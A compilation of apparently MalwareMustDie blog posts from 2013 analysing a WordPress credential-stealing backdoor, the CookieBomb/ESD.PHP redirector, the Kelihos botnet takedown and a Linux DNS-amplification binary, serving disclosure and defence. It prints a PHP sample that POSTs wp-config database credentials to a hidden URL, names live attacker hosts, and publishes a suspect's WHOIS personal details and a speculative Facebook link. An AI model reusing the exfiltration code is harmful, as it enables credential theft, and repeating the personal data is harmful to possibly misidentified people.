It is nothing new to hear that a WordPress or other PHP-based CMS site has been hacked and injected with malicious code.
The hacked sites are injected with code scattered across the WordPress PHP files, which is obviously hard to find, with the aim (mostly) of (1) compromising the server and (2) implanting backdoors to be used for (3) the further steps of malicious activity.
This post covers one of the popular schemes at the initial stage of a compromised site: using the cURL library and a FORM/POST request to upload a file containing credentials grabbed from wp-config.php (the site's database name, username and password) as the hacker's first step, followed by (not covered here) the remote execution script (mostly involving tweaks of the web server security settings in .htaccess or other WP components) that is triggered by spam or by redirection from another hacked non-PHP (i.e. JavaScript) evil code. Here we go:
The Code
I received a heads up from fellow crusaders (thank you for the good report) about a new method of obfuscating the evil backdoor code (in this case the POST destination site). Obligated to spread the information around, I wrote this post. The evil code was detected in the file functions.php, as per the snippet below:
The above malicious code structure contains the credential-grabbing method, which accesses the config in wp-config.php, followed by preparation for uploading a file, then the FORM method used to upload the data which contains the obfuscated destination URL, and the forming of the blog's path, all wrapped together to be POSTed by the cURL library in PHP. The detailed breakdown of the code with explanation is as per below:
The obfuscation used in the red-marked area can be decoded manually by using the ASCII table here-->>[LINK], or, in my case, I followed and tweaked the original code to de-obfuscate it as per the following code: Which "$ty" will give us the value of the bad URL (the URL is jinxed for security purposes) below: ht tp : // thedojoreviews .com / post.php
OK, what we have here is a theft case, a real credential and privacy stealing case which needs to be followed down to its root: the individual bad actor (read: moronz) who implemented this threat.
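As an added example (not code from the original post), the following Python scanner looks for the combination this post describes in a WordPress theme file: references to the wp-config.php database constants, a cURL POST, and a destination URL hidden as a chain of ASCII codes, which it decodes. The injected file below is constructed for the example and its decoded URL is a placeholder; the chr()/hex forms of the obfuscation are assumptions, since the post's screenshot is not reproduced here.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed fragment of an injected theme functions.php, modelled on the scheme the post
# describes: read the DB credentials from wp-config.php, prepare POST fields and send them
# with cURL to a destination URL hidden as a chain of chr() ASCII codes.  The destination
# decodes to a placeholder (.invalid TLD), not the real one from the post.
SAMPLE_FUNCTIONS_PHP = r"""<?php
add_action('init', 'theme_setup');           // legitimate-looking neighbour
function theme_setup() { }
function wp_cache_sync() {
    $d = array('h' => DB_HOST, 'n' => DB_NAME, 'u' => DB_USER, 'p' => DB_PASSWORD,
               'b' => get_bloginfo('url'));
    $ty = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(101).chr(118)
         .chr(105).chr(108).chr(46).chr(105).chr(110).chr(118).chr(97).chr(108).chr(105)
         .chr(100).chr(47).chr(112).chr(111).chr(115).chr(116).chr(46).chr(112).chr(104).chr(112);
    $ch = curl_init($ty);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));
    curl_exec($ch);
}
"""

# A run of at least four chr(N) calls joined by "." (possibly across lines).
CHR_RUN = re.compile(r"(?:chr\(\s*\d+\s*\)\s*\.?\s*){4,}")
CHR_NUM = re.compile(r"chr\(\s*(\d+)\s*\)")
# A run of at least four \xNN escapes, another common way to hide the same string.
HEX_RUN = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){4,}")

INDICATORS = {
    "reads wp-config credentials": re.compile(r"\bDB_(?:NAME|USER|PASSWORD|HOST)\b"),
    "uses cURL": re.compile(r"\bcurl_(?:init|setopt|exec)\b"),
    "sends POST fields": re.compile(r"\bCURLOPT_POST(?:FIELDS)?\b"),
    "chr()-encoded string": CHR_RUN,
    "hex-escaped string": HEX_RUN,
}


def decode_chr_runs(php: str) -> List[str]:
    """Turn every chr(104).chr(116)... chain into the string it builds."""
    return ["".join(chr(int(n)) for n in CHR_NUM.findall(m.group(0)))
            for m in CHR_RUN.finditer(php)]


def decode_hex_runs(php: str) -> List[str]:
    """Turn every \\x68\\x74... run into the string it builds."""
    return [bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1")
            for m in HEX_RUN.finditer(php)]


def scan_php(php: str) -> Dict[str, object]:
    """Report which indicators a PHP source hits and any URLs hidden in encoded strings.
    A theme or plugin file that reads DB_PASSWORD, calls cURL and carries an encoded URL
    is the credential-exfiltration pattern from the post; wp-config.php itself and
    wp-includes legitimately contain some of these pieces, but not all three together."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(php)]
    decoded = decode_chr_runs(php) + decode_hex_runs(php)
    urls = [s for s in decoded if re.match(r"https?://", s)]
    suspicious = ("reads wp-config credentials" in hits and "uses cURL" in hits
                  and bool(urls))
    return {"hits": hits, "decoded": decoded, "urls": urls, "suspicious": suspicious}


def scan_tree(root: Path) -> Dict[str, Dict[str, object]]:
    """Scan every .php file under a WordPress install; return only files with hits."""
    results = {}
    for path in root.rglob("*.php"):
        report = scan_php(path.read_text(errors="replace"))
        if report["hits"]:
            results[str(path)] = report
    return results


if __name__ == "__main__":
    print(scan_php(SAMPLE_FUNCTIONS_PHP))
```

Point scan_tree at a copy of the site's document root; files flagged suspicious deserve a diff against a clean copy of the theme or plugin.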
Alive PoC
Currently the URL is up and alive, as shown in URLQuery (thanks always, guys!), with no bad activity detected: the URLQuery link is here-->>[LINK]
Network Investigation
For legal purposes, below is the information needed to file this as a cyber-crime case:
The domain registration record of THEDOJOREVIEWS.COM
Domain Name: THEDOJOREVIEWS.COM
Registrar: CRAZY DOMAINS FZ-LLC
Whois Server: whois.syra.com.au
Referral URL: http://www.crazydomains.com
Name Server: NS21.CHEAPHOSTINGBD.COM
Name Server: NS22.CHEAPHOSTINGBD.COM
Status: ok
Updated Date: 10-oct-2013
Creation Date: 06-feb-2013
Expiration Date: 06-feb-2014
The registrant data:
Registrant Details..:
Registrant Name.....: Thomas Jacob
First Name..........: Thomas
Last Name...........: Jacob
Address Line 1......: The Alm
Address Line 2......: monte Lane
City................: Aluva
State...............: Kerala
Country.............: IN
Post Code...........: 683102
Phone...............: (+91) 9447024365
Fax.................: (+)
Email Address.......: rocker7887i@gmail.com
The current IP used:
THEDOJOREVIEWS.COM. 14400 IN A 178.239.55.123
;; ANSWER SECTION:
THEDOJOREVIEWS.COM. 21600 IN SOA ns21.cheaphostingbd.COM. zahid230.gmail.COM. 2013101004 86400 7200 3600000 86400
THEDOJOREVIEWS.COM. 21600 IN NS ns21.cheaphostingbd.COM.
THEDOJOREVIEWS.COM. 21600 IN NS ns22.cheaphostingbd.COM.
THEDOJOREVIEWS.COM. 14400 IN A 178.239.55.123
THEDOJOREVIEWS.COM. 14400 IN MX 0 THEDOJOREVIEWS.COM.
The exact same registration data is spotted here-->>[LINK] Trailing the details: This is the URL of the Facebook profile fetched-->https://www.facebook.com/iVishnu007 This is his Facebook profile picture.. could this be our bad actor? Well, it is way too easy indeed.. Just in case, we dumped everything. Thanks to @essachin :-)
Furthermore the name popped up in the "Security Researcher Acknowledgments for Microsoft Online Services - February 2013 Security Researchers" list, link-->>[HERE]. The investigation is still OPEN; feel free to advise us on reporting the correct bad actor's ID to law enforcement by sending us a message via the Comment section below (the information will be filtered for investigation purposes).
The Moral of Story
We will see more of this threat; this is the work of automation. Our advice will sound like a cliché, but: please always update and patch your web server, PHP and WordPress to the latest version, and don't forget to harden your configs by eliminating unnecessary services or holes that could be used by "bad people". Once in a while it is a good idea to scan your own site to learn how to improve its security. Please stay safe!
Not so long ago, during my recovery (I had eye surgery recently), I posted in our pastebin a disclosure of the ESD.PHP malware redirector, "The Server Side's Evil Code"; the link is here-->>[MMD Pastebin]. It was a good post and received many questions. The main questions were obviously about (1) how this threat redirector ACTUALLY works (with an actual example), and (2) how to decode (read: crack) it from a practical point of view, for which I took a rain-check for quite a while. Today, while sorting through all of my pending research tasks, I found the issue, so this write-up hopefully answers much curiosity and can be used as a reference for decoding and mitigating similar threats. So today we are going to play a lot with JavaScript and then switch to the PHP code.
I must warn you that I am not a natural coder in those two languages, so please bear with "my way" of decoding.
Infection
It started with a local site (as per the snapshot below) that was detected as infected by the CookieBomb script infector. Some JavaScript was called from this site, as per the captured traffic below:
Code Analysis
I found two types of CookieBomb code injected in that site, the older one and "a bit" more recent ones (note: plural, since multiple injections were detected). The obfuscation uses the same kind of generator, as per the snippet below: There do not seem to be many differences between those evil codes, do there? But after deobfuscation the differences appear; for your convenience I compared the deobfuscated codes below:
They are obviously CookieBomb codes, so let's see where they go. The older one looks to have been in the site for quite a long time, so the EK it pointed to does not exist anymore, and I skipped it.
Spoofing a CookieBomb ;-)
OK. Let's pay attention to the newer code. Let's assemble the request that passes the conditions and values this infector expects. Any tool or command line can be used for this purpose; I myself used several methods and got the same result, but I prefer to use the shell for this operation so I can adjust here and there. The access is as seen in the successful attempt below: Obviously an HTTP/1.0 500 Internal Server Error occurred; some automation may not get anything after the error, but the rest of the data is all that I need. The data part contains two blobs of code, as explained below: Now the partial form of the ESD.PHP code can be seen, so let's go and crack this. It's not so difficult.
Decoding the threat
As we saw, the two blobs of code are not JavaScript anymore; they are PHP, and an ESD script. So let's open the reference to the previously disclosed server-side script here-->>[MMD Pastebin]. All you have to do is basically put the pattern I pasted in the pastebin into this one. The step-by-step method is:
Take the Array blob and put it into the modified PHP script below: Then let's run it; you'll get values similar to the ones below, which I separated into sections for better understanding: You can also simulate it in any PHP environment to get the output below: Moving along.. we will need to fill these variables:
Use the "cracked key" part decoded above to learn the threat's actual destination (for redirection), and we also need the FORM information decoded above to know the operation performed by this threat.
Now for extracting the key parts: using the decoded array values we know that the values are:
$key = 'gYwQF6jN';
$Salt = 'LtgkD';
$Gamma = '';
Now fill those variables with their values in the script below to generate $c, which is the key to everything:
And all we have to do is execute the script to get the output below: Let's put the values into the exact fields of the cracked FORM above to fill the matrix and understand what it is all about: Well, obviously the infection will redirect the user to IP 5.152.200.50, requesting access to 5.152.200.50/wds/ohlo.php, with a failover to http://localhost/. Note that we need the values KEY:'1lwk8Ch7tUUKQyO' and ID:'28435' for further research; the code below explains the POST command that will be executed using all of the above matrix values: Yes, we have the redirection by reversing, without simulating the infection. The point of this post is to help IR friends to have a reference for investigating this infection, and also, by understanding this decoding method, hopefully many filtering rules can be applied to prevent the wide infection of the latest CookieBomb using the ESD.PHP logic.
Thanks to @kafeine for grabbing the server-side code and allowing me to pastebin it, to the MMD Germany team (can't mention more) for the PHP code discussion, and to all MMD folks, you all rock. Additionally, for your information, CookieBomb is a serious threat; it is operated by automation, as per the Twitter snapshot below, and is related to a much bigger threat that drives many more infections with exploitation tools, with or without botnets. I hope this threat will also be prioritised more.
Feel free to ask in the comments; they are moderated for security purposes. Ah, BTW, please don't worry about this disclosure: even though the bad actors will change the threat's logic after I release this disclosure, their level isn't that high, and we can easily crack them again, and again, and again. Have faith, friends!
This is the report of the effort in our MalwareMustDie Tango Down OP, with the action initiated and finished by @essachin (well done!). This all started with the report on Twitter from @ax0n, as per the snippet below:
#CrtyptoLocker's main C&C? This isn't sinkholed yet: ddbmdffeglno[.]org currently resolves to 192[.]155[.]83[.]72 #MalwareMustDie
All domains listed above are also confirmed blocked by SURBL and Spamhaus, as can be seen in the list here-->>[PASTEBIN], and confirmed against the overall infected CnC URLs posted in VirusTotal-->>[HERE], supported by references from the good CIS Alert reports: [1] and [2]
The domains were suspended with the confirmation below: We also announced the suspension on Twitter below:
1: We initiated the takedown of 2,989 domains via the Internet Domain Registrar's suspension method.
2: They belonged to various EKs/Trojans having the same ID as the Kelihos reseller domain, as follows:
3: We are only allowed to release a partial list of 311 of the 2,989 domains (below).
On the 5th of December 2013 I was honoured to represent MalwareMustDie, an NPO group, in a short talk about the Kelihos fast-flux botnet. The talk was shared between myself, as MalwareMustDie OP Kelihos team leader, and Mr. Dhia Mahjoub of OpenDNS Umbrella Lab, and we were "supposed" to finish the talk in 20 minutes, meaning I had to wrap up my part in 10 minutes.. Therefore I really thank BotConf for the adjustment in time, saving me from choking myself :-))
MalwareMustDie recently launched a classified and important operation against the Kelihos botnet. The operation, called OP Kelihos (obviously..), started in August 2013 as initiated in our blog post-->>[HERE]; it was followed by the CnC takedown effort to PoC the link between the CnC list and the Kelihos payloads, also explaining a "HowTo" for stopping the Kelihos botnet from serving its payloads (we executed those takedowns starting from the 1st of December in the Netherlands and Germany); and in the end, the disclosure of recent facts about the botnet, showing the botnet's weaknesses, and the disclosure of the botherder's ID at BotConf, Dec 5th 2013 in Nantes, France.
At BotConf we split the presentation between myself and Dhia Mahjoub under the outline below, and I gave the Kelihos talk for Parts 2, 3 and 4, as shown in the slide:
Kelihos is a very well-known botnet with a long history of surviving several takedown efforts. Technically known as a fast-flux botnet, among its various functions (DNS, spambot, peer-to-peer) Kelihos spreads malware affiliates' binaries via its infected peers, which is covered by multiple layers of encryption to hide the core service that they actually depend on: the botnet as a service for malware affiliation.
This post explains how the MalwareMustDie team fights against the Kelihos botnet, targeting the botnet's payload delivery scheme as its weakest point. The write-up is based on BotConf 2013 slides parts 2, 3 and 4, the part that I presented at BotConf, but now compiled for the public. I will not share the "too sensitive" information in this post; all of the related data is cyber-crime evidence for law enforcement to follow. There are many functions of the Kelihos botnet that I don't cover, such as its independent DNS scheme supporting the fast-flux functions, the spambot functions, the blacklist-checking functions, and so on; we will stick to the HTTP function that serves the payloads. My co-presenter, Dhia, will post his part of the presentation, explaining the details of Kelihos fast-flux monitoring in IPs, domains and trends, in a separate post to be linked later (this part will be edited once the link is ready).
The Encryption
We have all read descriptions and definitions of Kelihos a lot, so I will skip the boring part and go to the point where the investigation started. Mr. Kyle Yang of Fortinet was the first to publish on Kelihos' encrypted communication, at Black Hat Europe in Amsterdam 2012, link-->>[HERE], and what he explained in that presentation about the encryption of communication between the Kelihos job servers and CnC is a fact that should not be ignored. Our project in fighting Kelihos started from it. You'd better read Mr. Yang's work on his blog-->>[HERE] to understand the details before continuing with the rest of this post.
The most important thing you get after decrypting Kelihos CnC communication is the botnet's commands/methods and the service that spreads the malware payloads being served from its peers via the registered domains and file names. The picture below is a sample of the encrypted communications in Kelihos:
Well, as you can see, the domain name and the payload name exist in the communication. The data in the picture above was captured in a post-infection session, where the data between the infected peers (proxies) and the job servers and CnC was hooked.
The question raised from my side: what is the logic for a new pre-infection, then? The question is answered by the existence of the "loader" (read: downloader) binaries delivered during infection to download the payload from the domains shown in the picture above. If you want to take a look at what I analysed in the Texas Explosion malvertisement in April 2013-->>[HERE], this is a sample of the download scheme for the pre-infection with the downloader, which calls the domains and payloads as per below:
The Key of BotNet as Service: the Payloads
As I explained at BotConf, the pattern for the domains and payloads follows the same logic as per the slides below (see the first slide for the logic and the next slides for the PoC). Fortunately this is something that the Kelihos moronz cannot change immediately, since the space used for the encryption is so limited:
Furthermore we figured out the payload distribution of this botnet and implemented the "generic" samples (used as PoC for domain suspensions) in URLQuery, as per the regex below:
And we also implemented the same logic in the Kelihos botnet monitoring IRC channels per country:
And we also use the same logic for the evidence in damage reports of Kelihos infections in specific countries:
A bit About Kelihos Payload
In every peer infection of the Kelihos botnet there are root and loader directories that share the payloads. The root directory contains the original and malware affiliates' binaries (related to the pay-per-install scheme), and the loader one contains the downloader binaries for the affiliates' malware. Dhia made good statistics on the previous sample and I drew the conclusion from it. See the two slides below for the explanation of the differences between the payloads served from the root directories. It explains why there are payloads with high detection rates and payloads with very low detection rates.
Systematic Investigation to Reveal the Botherder ID
Since the botnet needs payloads to serve, and by the technical scheme of Kelihos the payloads need ALIVE domains to be distributed, cracking the ID of the Kelihos botherder is not difficult in theory but is really delicate work in our intel department.
On July 19th, 2013 I announced the activity of MalwareMustDie in cleaning up all .RU domains used by Kelihos, as posted-->>[HERE]. Up to that time we saw a lot of Kelihos distributed by the RedKit exploit kit as its main infector, together with the PHP redirection tool ESD.PHP (see the write-up about it-->>HERE). RedKit has quietly disappeared now, ESD evolved into CookieBomb, and the Kelihos infector also shifted to this new infection tool. OK.. back on track: after the .RU domains were sacked, the Kelihos moronz shifted to the common TLDs (read: internet domains) all over the world, abusing many ICANN-accredited registrars by using lame domain resellers to register the payload domains of Kelihos. This is the point where we started the current operation.
First of all, since we started the investigation from zero with the new trend in payload TLDs (in early August 2013), we needed as much reference as possible; at that point, when Kelihos started to use INTERNET.BS as the registrar for its payloads, our reference was also zero. Yes, with the help of abuse.ch (with many thanks for Roman's GREAT effort), we sinkholed the domains, and then with the wonderful cooperation of CERT organisations, LE and registrars we also had the ability to suspend the domains. The recorded domains used have the characteristics pictured below, which we PoC'ed in the blog post on the Kelihos payload domains-->>[HERE]
The distribution of the domains itself varies across registrars all over the world, with the list on the presentation slide I presented at BotConf below (the total data so far is 913 domains from August until the 3rd of December 2013, but the picture below covers the data until mid-October 2013):
The team had good coordination to seek and destroy new domains. It was pretty hard at the beginning, under mocking and grins from some researchers.. but our group kept on detecting, checking and taking down the domains to force trails of evidence for data cross-check comparison, until we had an overall positive ID of the third-party domain resellers (note the "s": plural, more than two) used by this criminal action.
Cross-checking the email ID above with (1) domain-shopping sites, (2) promotion of the Kelihos botnet in some black forums, and the way the botherder does AV scanning of new payload domains before releasing the new domains/payloads in the CnC communication and pushing them to the peers, we connected the dots and all lead to one important communication centre owned by the botherders. Below are some limited snapshots from the disclosure at BotConf:
The SQL dump of the "black forum promoting Kelihos", confirming the domain reseller's email address for Kelihos:
The domain-shopping SQL records that reveal the botherders' email ID:
Information leading to a "well-known AV and URL scanner that checks for bad domains" being used by the Kelihos botherders to check the new domain (URL) and its payloads:
All the above data leads to the main communication ID :-)
The PoC to link the ID to the Payload of Kelihos
Through the legal-entity collaboration with our partner (GroupIB) to build evidence to be reported to law enforcement, we conducted heavy surveillance of the bad actor's communication ID to find :-) "every piece of evidence" we needed.
At BotConf we displayed the spam template orders (w00t), the orders/invoices/payments for the hosting of the CnC (w00t), and other communication channels they use, like a Twitter account (w00t), with also some extra ++ information. But the special information, like the WebMoney they used, hoster contracts and other data, we pass only to LE. Below is a list of the CnC and mothership servers of Kelihos hosted in the Netherlands and Germany that they used before BotConf 2013:
OP Netherlands & OP Morgenerwachen for PoC
We launched two operations on December 1st 2013 to prove, in the eyes of the law, that the list of CnC we extracted from the suspected botherder's communication is the Kelihos payload list. We basically worked under good coordination between the OP team, MMD members, and law enforcement channels in both countries (the Netherlands and Germany) to take down the listed CnC and save the data for evidence purposes accordingly. The PoC to be proven is: "If after taking down the CnC the payloads stop, the botherder suspect is beyond any doubt responsible for all Kelihos payload activities"
The Twitter timeline below is the evidence of the activities during the operations:
The PoC Positive Result, with Snapshot Images & Videos
The operation was successfully executed. As the result, after the CnC was completely down, the Kelihos botnet did not have ANY payloads to serve, or, to be precise, had errors in serving payloads; the evidence is as tweeted below:
The video below was taken while we shut down half of the CnC (in the Netherlands); the peer IP addresses of the Kelihos proxies still appear to respond to provide the payload infection, but the payload itself is not accessible, with HTTP error 502. (Please compare with the first video, which shows the normal payload download.)
The video below was taken after the full CnC was shut down; at that time the botnet could not even reach the peers anymore (see the READ ERROR and NO DATA RECEIVED messages shown for every wget request in my script to download the payload):
Yes, for some 3-4 days (during the beginning of BotConf) Kelihos was running without serving any payloads at all :-) The PoC that the CnC list extracted from the "suspected-yet-proven-guilty" botherder's communication links to the payload system of Kelihos is perfectly proven, as expected. The ID's owner is, beyond any doubt, the botherder's ID of the Kelihos botnet in this case, and really deserves to sleep in jail soon.
In the BotConf short talk we used slides to explain this PoC, since my 10 minutes were not enough to explain all of the facts; below are the slides explaining this PoC point:
The CrimeBoss, Kelihos BotHerder ID
All of the above data comes from one single communication channel owned by an individual whose ID I exposed at BotConf 2013. This Russian male of 37 years old is responsible for all activity in Kelihos. So if you have the picture, please pass it to your country's law enforcement to be processed further :-) For your information, I will not expose the information here; the information was actually passed to the related countries' law enforcement from September 2013.
Additionally, he is also responsible for the pump-and-dump spam, for which we recorded his communication ordering the templates from the translators, as shown in the slides below:
And also for your information, @kafeine wrote an excellent report about the iframe "CookieBomb" injection tool-->>[HERE], and in its contact section was written an email address with a domain that pointed to an IP address in the CnC server list described above:
There is also much more information which is very sensitive, confirming more malicious activities and connections of this moronz behind Kelihos; it is subject to being passed to all LE channels.
Conclusion
1. What is the best way to stop the Kelihos botnet? We cannot stop it by taking down the infection peers. This threat can only be stopped by the arrest of the bad actors, or by finding a way to stop the Kelihos botnet from serving malware payloads, at the disruption level. :-) Taking down domains and peers won't help much, unless you need the investigation reference data, like we did, to find the pattern and start connecting the dots.
2. With good coordination between security researchers as one team, we can detect, monitor, investigate, build evidence, pull some PoC to prove the crime scheme, and pass the information to LE in a good wrap. This level of information is what is actually needed to make sure the arrest stays on the rails. We will still and always need your help to push and make sure that the ID proven guilty and disclosed at BotConf goes to jail accordingly.
3. The video and presentation will be shared after editing is finished.
Thank you
As MalwareMustDie, NPO, we thank the BotConf team, who so kindly offered us a place and great hospitality to take the "stage". I personally like the idea of a botnet conference very much, and will do my very best to support the event in the future too; I guess we have to prepare to crack another botnet's moronz ID to present at BotConf 2014. Count us in, we will be there. Thank you again Eric, Seb and the team! God bless your good effort!
I thank all OP Kelihos friends involved in this operation who helped make it a success from day one. Without your trust and being with us since the beginning this coordination would never have happened; for some security reasons discussed with my lawyer, it is best not to reveal your IDs in this post. At least, as researchers we did what we could do, and I'd say we did not do badly in this case. Respect to you all. :-)) Glad to work together with such a solid team.
I would like to thank GroupIB, who are trying hard to push the case to law enforcement; I really wish you guys to see the PoC that we want to confirm here, that the CnC list and the Kelihos payloads are connected in the clearest way, so there will be no doubt left in sending the suspect to jail to pay for his sins. I thank Mr. Christiaan Beek from McAfee, who did great, great work in taking down the CnC. To fellow crusaders (Markus Fritz, Hans W. Opot) in Germany, with the help of LKA/BKA, for supporting this PoC in taking down the CnC: respect to you all also.
Thank you also to the US team of MMD who helped in monitoring the case and the shutdown, especially Mr. Andre Dimino, Mr. Dave Marcus, @rjacksix, @Cephurs and @Malmouse, for your advice, confirmation and patience in dealing with the stubborn researchers in MMD.
I especially and personally thank one person so much: @kafeine, who helped me a lot and stayed behind the scenes of this operation. Also great thanks for the great intel conducted by our intel team (I cannot reveal their ID yet, but he was always with me at BotConf.. if you know what I mean..) .. and to all supporters of MalwareMustDie (including Paul with his new Templar robe), YOU ARE THE BEST!!
Kudos BotConf 5-6 Dec 2013, Nantes, France - Nice memory!
Consider this as "another" MalwareMustDie New Year security awareness post. We detected an increase in hacking attacks aimed at deploying DNS amplification tools, especially ELF ones, not necessarily with automated hack tools: the video below is evidence showing a manual hacking effort. We bumped into this threat in early November 2013, when our friend @lvdeijk found the set of binaries below in his honeypot: This turned out to be a set of DNS-amp attack binaries for PE and ELF (see the "ms20" one in the set above). We investigated the ELF and posted it in our pastebin here-->>[MMD PASTEBIN].
Reversing shows that the ELF binary has code for DNS amplification, sensitive-information stealing and encryption of the data, but in behaviour testing it did not show any amplification, instead beaconing to the mothership, which suggests that the Linux binary is not working as expected by the amateur-wannabe-Linux-developer moronz. So we left the case in monitoring status.
After that, other good security people investigated the case, as per the URL references below, explaining the threat very well; please take a look at the good posts below before continuing with this post:
However, today we face the fact that not only is @lvdeijk still getting hit by the same attacker, but one of our OTHER friends' (thanks to @wirehack7) honeypots also got hit by the same threat, so we took precautions to PoC the attack, and this time everything was recorded, down to the shell commands used while the attack was in progress, as recorded in the video below:
So this is the BAD NEWS: the threat is active as of Dec 27, 2013, when I write this post! And this threat lives happily ever after, infecting and hacking UNIX environments in many networks on the internet. As most of us in MMD are Unix men we couldn't stand watching this, so hopefully this post will raise MORE awareness of the threat, as we have also started an OP for it. I was wondering IF the ELF download source is still up today, so I made a quick check and found positive confirmation; I just grabbed my iPad to make this video as evidence:
To make it merrier.. as everyone knows, VT also shows low detection for these ELF (read: Linux executable binaries) samples, as shown in the AV results. It has never reached more than 5 detections so far. I am starting to wonder why so many Linux AV scanner products cannot detect this? A fact that users must swallow when they expect to detect this on their servers using some products.
OK. I don't want to argue about any signature matters in the AV industry, but I must say that ELF is a serious threat that needs to be prioritised more, especially in hack sessions like this. Please think about the large number of users who actually buy a licence per year to protect their servers from threats like this; they deserve BETTER service, so please make more effort to publish your signatures.
Moving on. Just to be sure, I quickly re-analysed the new/recent ELF, with the details below, using my poor home-brew tool called fileelf, which is actually a bash script helping me analyse ELF binaries quickly. The result is that all the functions are the same and the only modification detected is in the destination IP addresses (of the CnC). The logic is all the same: once it starts the daemon it grabs all the info from the environment, and then the series of "communications" begins. Note that the config created had only its initial values in the first write and nothing more, so (maybe) one should let this evil tool run longer to monitor and record all of the CnC communication, to get a better record of what this tool can actually do.
(! ELF Analysis )
$ fileelf ./disknyp
./disknyp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
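As an added example (not the author's fileelf script), a small ELF32 header reader in Python that derives the same triage facts shown above: class, byte order, machine, whether the binary is statically linked (no PT_INTERP/PT_DYNAMIC program header) and whether it is stripped (no SHT_SYMTAB section). The sample image is constructed in the code; the version and kernel ABI note fields that fileelf prints are not derived here.

```python
import struct
from typing import Dict, List

E_MACHINE = {3: "Intel 80386", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}
PT_DYNAMIC, PT_INTERP, SHT_SYMTAB, SHT_STRTAB = 2, 3, 2, 3


def triage_elf(data: bytes) -> Dict[str, object]:
    """Parse an ELF32 image (the sample in the post is 32-bit) and return triage facts."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class != 1:
        raise ValueError("only ELF32 is handled in this example")
    bo = "<" if ei_data == 1 else ">"
    # ELF32 header after e_ident: type, machine, version, entry, phoff, shoff, flags,
    # ehsize, phentsize, phnum, shentsize, shnum, shstrndx (36 bytes).
    (e_type, e_machine, _ver, e_entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx) = \
        struct.unpack_from(bo + "HHIIIIIHHHHHH", data, 16)

    # Program headers: a dynamic binary carries PT_INTERP (the loader path) or PT_DYNAMIC.
    ptypes = [struct.unpack_from(bo + "I", data, e_phoff + i * e_phentsize)[0]
              for i in range(e_phnum)]
    dynamic = PT_INTERP in ptypes or PT_DYNAMIC in ptypes

    # Section headers: names live in the string table indexed by e_shstrndx.
    sections: List[str] = []
    has_symtab = False
    if e_shnum and e_shoff:
        shdrs = [struct.unpack_from(bo + "IIIIIIIIII", data, e_shoff + i * e_shentsize)
                 for i in range(e_shnum)]
        str_off, str_size = shdrs[e_shstrndx][4], shdrs[e_shstrndx][5]
        strtab = data[str_off:str_off + str_size]
        for sh in shdrs:
            sections.append(strtab[sh[0]:].split(b"\0", 1)[0].decode("ascii", "replace"))
            has_symtab = has_symtab or sh[1] == SHT_SYMTAB
    return {
        "class": "32-bit",
        "data": "LSB" if ei_data == 1 else "MSB",
        "type": E_TYPE.get(e_type, f"type {e_type}"),
        "machine": E_MACHINE.get(e_machine, f"machine {e_machine}"),
        "entry": e_entry,
        "linking": "dynamically linked" if dynamic else "statically linked",
        "stripped": not has_symtab,
        "sections": sections,
    }


def describe(t: Dict[str, object]) -> str:
    """One-line summary in the style of file(1) / the fileelf output above."""
    return (f"ELF {t['class']} {t['data']} {t['type']}, {t['machine']}, {t['linking']}, "
            f"{'stripped' if t['stripped'] else 'not stripped'}")


def triage_file(path: str) -> Dict[str, object]:
    with open(path, "rb") as fh:
        return triage_elf(fh.read())


def build_sample_elf() -> bytes:
    """Constructed minimal static, unstripped i386 ELF image for the example: header,
    one PT_LOAD program header and three sections (null, .shstrtab, .symtab).  It is a
    layout skeleton only and contains no code."""
    shstr = b"\0.shstrtab\0.symtab\0"            # .shstrtab at index 1, .symtab at 11
    ehsize, phsize, shsize = 52, 32, 40
    phoff = ehsize
    shstr_off = phoff + phsize
    shoff = shstr_off + len(shstr)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0, 0]) + b"\0" * 7   # ELF32, LSB, version 1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, phoff, shoff, 0,
                               ehsize, phsize, 1, shsize, 3, 1)
    phdr = struct.pack("<IIIIIIII", 1, 0, 0x8048000, 0x8048000, 0, 0, 5, 0x1000)
    null_sh = struct.pack("<IIIIIIIIII", *([0] * 10))
    shstr_sh = struct.pack("<IIIIIIIIII", 1, SHT_STRTAB, 0, 0, shstr_off, len(shstr), 0, 0, 1, 0)
    symtab_sh = struct.pack("<IIIIIIIIII", 11, SHT_SYMTAB, 0, 0, 0, 0, 0, 0, 4, 16)
    return ehdr + phdr + shstr + null_sh + shstr_sh + symtab_sh


if __name__ == "__main__":
    print(describe(triage_elf(build_sample_elf())))
```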
So we see what the binary is all about. Below are some dis-assembly traces, which is confirming previous analysis made by many good people, so I won't make more unnecessary comments just paste my codes below:
*) NOTED: with dumping a very long disasm codes.. all show the match previous analysis by us and by others.
Moving along, I used my previous test bed. I am a BSD guy, so if I have to use Linux it is going to be Slackware, with some libs & patches added to its environment to make an evil binary run as if in heaven. I ran it to PoC some functions, and below are the notes I took; this shows a great deal about the source of the CnC:
(!BEHAV) // Without permission it fails: ** SELINUX **
$ ps ax
 7297 ?        S      0:00 /bin/sh
 7391 ?        Ssl    0:00 ./disknyp   <== See its PID (the point of this ps buff)
 7434 pts/0    R+     0:00 ps ax
(!NETSTAT)
$ netstat -napt
(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address            Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:xxx            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:xxx            0.0.0.0:*               LISTEN      -
tcp        0     27 diemoronz.mmd.org:39445  190.115.20.27:59870     ESTABLISHED 7391/disknyp
(!CONFIGS) // This is where they put the default port range and bind IP for the overall process:
$ cat fake.cfg
0 127.0.0.1:127.0.0.1 10000:60000
